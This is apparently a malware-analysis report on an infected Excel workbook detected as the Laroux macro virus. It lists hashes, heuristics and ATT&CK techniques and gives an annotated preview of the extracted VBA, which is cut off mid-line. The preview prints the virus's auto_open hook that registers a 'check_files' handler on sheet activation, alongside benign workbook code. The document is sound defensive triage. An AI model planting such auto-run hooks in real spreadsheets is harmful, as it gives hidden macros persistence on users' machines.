Xls.Trojan.Laroux-28 — Office (OLE) malware analysis

Static analysis result for SHA-256 6caeb9ed6c397f93…

MALICIOUS

Office (OLE)

62.5 KB Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 37fc8ae092b168187b3abe5ab4aad2d0 SHA-1: bcbbe0c6f993f0e7123cec13fa52135e3a823dda SHA-256: 6caeb9ed6c397f93ea31e152023b8a7dc7251ce7c55133f1c8f4dcd9a42e7987
240 Risk Score

Malware Insights

Xls.Trojan.Laroux-28 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

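This Excel file contains a critical 'Laroux' macro marker and is detected by ClamAV as Xls.Trojan.Laroux-28. The auto_open macro runs when the workbook is opened and assigns 'check_files' to Application.OnSheetActivate, so that subroutine is invoked on subsequent sheet activations rather than directly at open; registering a handler this way is a common technique for malware to establish persistence or initiate malicious actions. The script also adds a temporary 'Pricing' command bar whose Insert and Delete buttons call InsertRow and DeleteRow. In the preview below this code reads like the host workbook's own interface, so the command bar on its own should not be treated as an indicator of malicious intent.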

Heuristics 4

  • ClamAV: Xls.Trojan.Laroux-28 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Laroux-28
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30528 bytes
SHA-256: 78984b347c4de27f33f000870b5344d6ab1d28a17bf7c2afa2f7eea57a69863c
Detection
ClamAV: Xls.Trojan.Laroux-28
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "pldt"

' Module-level state shared by the routines in this module.
' In VBA an "As <type>" clause applies only to the name it follows, so in this
' declaration only Markup is an Integer; X, Y and ContSet are Variants.
' Analyst note: the module is named "pldt"; detection rules that match on a
' specific module name should be checked against the name shown here.
Global X, Y, ContSet, Markup As Integer

' auto_open: Excel runs a macro with this name automatically when the workbook
' is opened; this is the entry point flagged by the report's OLE_VBA_AUTO finding.
'
' Analyst notes (defensive triage):
'   * The first statement assigns "check_files" to Application.OnSheetActivate.
'     check_files is therefore not called here; it is registered as a handler
'     and runs on later sheet-activation events. Its body is not part of the
'     preview visible here, so what it does must be confirmed from the full
'     macros.bas extract.
'   * The handler is registered before "On Error GoTo TheEnd", so the error
'     trap covers only the command-bar code that follows. Any failure there
'     jumps to TheEnd and exits without a message, leaving the handler set.
'   * The remaining statements build a temporary floating "Pricing" command
'     bar with two buttons bound to InsertRow and DeleteRow (neither is defined
'     in the visible excerpt). This looks like workbook UI code rather than
'     replication logic - TODO confirm against the full extract.
'   * cbutton1 / cbutton2 are not declared in this procedure; presumably they
'     are implicit Variants unless declared elsewhere in the module.
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
     ' Register the sheet-activation handler (the behaviour of interest for detection).
     Application.OnSheetActivate = "check_files"
     ' From here on, any runtime error skips straight to the end of the procedure.
     On Error GoTo TheEnd
     ' Create the temporary floating "Pricing" bar and make it visible.
     CommandBars.Add(Name:="Pricing", Position:=msoBarFloating, temporary:=True).Visible = True
     ' Add two temporary button controls at positions 1 and 2 on that bar.
     Set cbutton1 = CommandBars("Pricing").Controls.Add(Type:=msoControlButton, before:=1, temporary:=True)
     Set cbutton2 = CommandBars("Pricing").Controls.Add(Type:=msoControlButton, before:=2, temporary:=True)
     ' Button 1: caption "&Insert", runs the macro named InsertRow when clicked.
     cbutton1.Visible = True
     cbutton1.Style = msoButtonIconAndCaption
     cbutton1.Caption = "&Insert"
     cbutton1.OnAction = "InsertRow"
     cbutton1.FaceId = 296
     ' Button 2: caption "&Delete", runs the macro named DeleteRow when clicked.
     cbutton2.Visible = True
     cbutton2.Style = msoButtonIconAndCaption
     cbutton2.Caption = "&Delete"
     cbutton2.OnAction = "DeleteRow"
     cbutton2.FaceId = 293
' Shared exit point: reached on normal completion and on any trapped error.
TheEnd:
End Sub

' EnableCustom: sets the Enabled property to True on each paired text box
' (txt*) and label (lbl*) of frmCont, plus the lblTotal and lblPercent labels.
' frmCont is defined outside the visible excerpt - presumably a UserForm in
' the same workbook; confirm against the full extract.
'
' Analyst note: every statement here is a property assignment on form
' controls. Nothing in this procedure touches files, other workbooks, the
' registry or the network, so it is unlikely to be what the Laroux signature
' matches on.
Public Sub EnableCustom()
Attribute EnableCustom.VB_ProcData.VB_Invoke_Func = " \n14"
    frmCont.txtRack.Enabled = True
    frmCont.lblRack.Enabled = True
    frmCont.txtASRS.Enabled = True
    frmCont.lblASRS.Enabled = True
    frmCont.txtLoad.Enabled = True
    frmCont.lblLoad.Enabled = True
    frmCont.txtSecondary.Enabled = True
    frmCont.lblSecondary.Enabled = True
    frmCont.txtControls.Enabled = True
    frmCont.lblControls.Enabled = True
    frmCont.txtInventory.Enabled = True
    frmCont.lblInventory.Enabled = True
    frmCont.txtPower.Enabled = True
    frmCont.lblPower.Enabled = True
    frmCont.txtMisc.Enabled = True
    frmCont.lblMisc.Enabled = True
    frmCont.txtFire.Enabled = True
    frmCont.lblFire.Enabled = True
    frmCont.txtTransportation.Enabled = True
    frmCont.lblTransportation.Enabled = True
    ' The two summary labels have no matching text box.
    frmCont.lblTotal.Enabled = True
    frmCont.lblPercent.Enabled = True
End Sub

' DisableCustom: counterpart of EnableCustom. Sets the Enabled property to
' False on the same frmCont text boxes (txt*) and labels (lbl*), plus the
' lblPercent and lblTotal labels. frmCont is defined outside the visible
' excerpt - presumably a UserForm in the same workbook; confirm against the
' full extract.
'
' Analyst note: as with EnableCustom, this procedure only assigns properties
' on form controls and performs no file, workbook, registry or network
' operations.
Public Sub DisableCustom()
Attribute DisableCustom.VB_ProcData.VB_Invoke_Func = " \n14"
    frmCont.txtRack.Enabled = False
    frmCont.lblRack.Enabled = False
    frmCont.txtASRS.Enabled = False
    frmCont.lblASRS.Enabled = False
    frmCont.txtLoad.Enabled = False
    frmCont.lblLoad.Enabled = False
    frmCont.txtSecondary.Enabled = False
    frmCont.lblSecondary.Enabled = False
    frmCont.txtControls.Enabled = False
    frmCont.lblControls.Enabled = False
    frmCont.txtInventory.Enabled = False
    frmCont.lblInventory.Enabled = False
    frmCont.txtPower.Enabled = False
    frmCont.lblPower.Enabled = False
    frmCont.txtMisc.Enabled = False
    frmCont.lblMisc.Enabled = False
    frmCont.txtFire.Enabled = False
    frmCont.lblFire.Enabled = False
    frmCont.txtTransportation.Enabled = False
    frmCont.lblTransportation.Enabled = False
    ' The two summary labels have no matching text box.
    frmCont.lblPercent.Enabled = False
    frmCont.lblTotal.Enabled = False
End Sub

Public Sub GetPercentCustom()
Attribute GetPercentCustom.VB_ProcData.VB_Invoke_Func = " \n14"
    Dim I As Double
    'Gets Rack %
    frmCont.txtRack.Text = Range("RackCont")
    I = frmCont.txtRack.Text * 100
    I = Format(I, "##0.0")
    frmCont.txtRack.Text = I
    'Gets AS/RS %
    frmCont.txtASRS.Text = Range("ASRSCont")
    I = frmCont.txtASRS.Text * 100
    I = Format(I, "##0.0")
    frmCont.txtASRS.Text = I
    'Gets Load Handling Equipment %
    frmCont.txtLoad.Text = Range("LoadCont")
    I = frmCont.txtLoad.Text * 100
    I = Format(I, "##0.0")
    frmCont.txtLoad.Text = I
    'Gets Secondary Load Handling Equipment %
    frmCont.txtSecondary.Text = Range("SecondCont")
    I = frmCont.txtSecondary.Text * 100
    I = Format(I, "##0.0")
    frmCont.txtSecondary.Text = I
    'Gets Controls %
    frmCont.txtControls.Text = Range("ControlCont")
    I = frmCont.txtControls.Text * 100
    I = Format(I, "##0.0")
    frmCont.txtControls.Text = I
    'Gets Inventory %
    frmCont.txtInventory.Text = Range("SoftCont") + Range("HardCont")
    I = frmCont.txtInventory.Text * 100
    I = Format(I, "##0.0")
    frmCont.txtInventory.Text = I
    'Gets Power Distibution & Communication System %
    frmCont.txtPower.T
... (truncated)